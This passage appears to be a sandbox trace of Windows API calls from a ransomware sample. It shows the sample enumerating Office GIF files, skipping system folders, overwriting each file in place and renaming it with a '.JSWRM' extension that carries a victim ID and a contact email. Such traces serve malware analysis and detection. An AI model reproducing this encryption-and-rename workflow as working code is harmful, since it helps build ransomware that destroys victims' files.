lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.775] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3480) returned 1 [0118.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd90) returned 0x24c1d0 [0118.775] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xd90, lpOverlapped=0x0) returned 1 [0118.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.927] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xd90, lpOverlapped=0x0) returned 1 [0118.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.927] CloseHandle (hObject=0x314) returned 1 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0118.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0118.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0118.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0118.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.927] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.929] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6d, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR1F.GIF", cAlternateFileName="")) returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2=".") returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="..") returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="...") returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="windows") returned -1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="recovery") returned -1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="perflogs") returned -1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="documents and settings") returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="system volume information") returned -1 [0118.929] lstrcmpiW (lpString1="PDIR1F.GIF", lpString2="msocache") returned 1 [0118.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0118.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR1F.GIF", lpUsedDefaultChar=0x0) returned 10 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0118.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0118.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR1F.GIF", lpUsedDefaultChar=0x0) returned 10 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0118.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0118.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.931] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3949) returned 1 [0118.931] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf60) returned 0x24c1d0 [0118.931] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xf60, lpOverlapped=0x0) returned 1 [0118.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.950] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xf60, lpOverlapped=0x0) returned 1 [0118.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.950] CloseHandle (hObject=0x314) returned 1 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0118.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0118.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0118.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0118.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0118.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR1F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir1f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.952] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3408, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR20F.GIF", cAlternateFileName="")) returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2=".") returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="..") returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="...") returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="windows") returned -1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="recovery") returned -1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="perflogs") returned -1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="documents and settings") returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="system volume information") returned -1 [0118.952] lstrcmpiW (lpString1="PDIR20F.GIF", lpString2="msocache") returned 1 [0118.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR20F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR20F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR20F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0118.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR20F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR20F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR20F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir20f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.953] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13320) returned 1 [0118.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3400) returned 0x24c1d0 [0118.953] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3400, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3400, lpOverlapped=0x0) returned 1 [0118.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.956] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3400, lpOverlapped=0x0) returned 1 [0118.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.956] CloseHandle (hObject=0x314) returned 1 [0118.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0118.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0118.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.957] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir20f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR20F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir20f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.958] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR21F.GIF", cAlternateFileName="")) returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2=".") returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="..") returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="...") returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="windows") returned -1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="recovery") returned -1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="perflogs") returned -1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="documents and settings") returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="system volume information") returned -1 [0118.958] lstrcmpiW (lpString1="PDIR21F.GIF", lpString2="msocache") returned 1 [0118.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR21F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR21F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR21F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0118.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR21F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR21F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR21F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0118.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0118.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir21f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.959] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11646) returned 1 [0118.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0118.959] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x2d70, lpOverlapped=0x0) returned 1 [0118.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.961] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x2d70, lpOverlapped=0x0) returned 1 [0118.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.961] CloseHandle (hObject=0x314) returned 1 [0118.962] 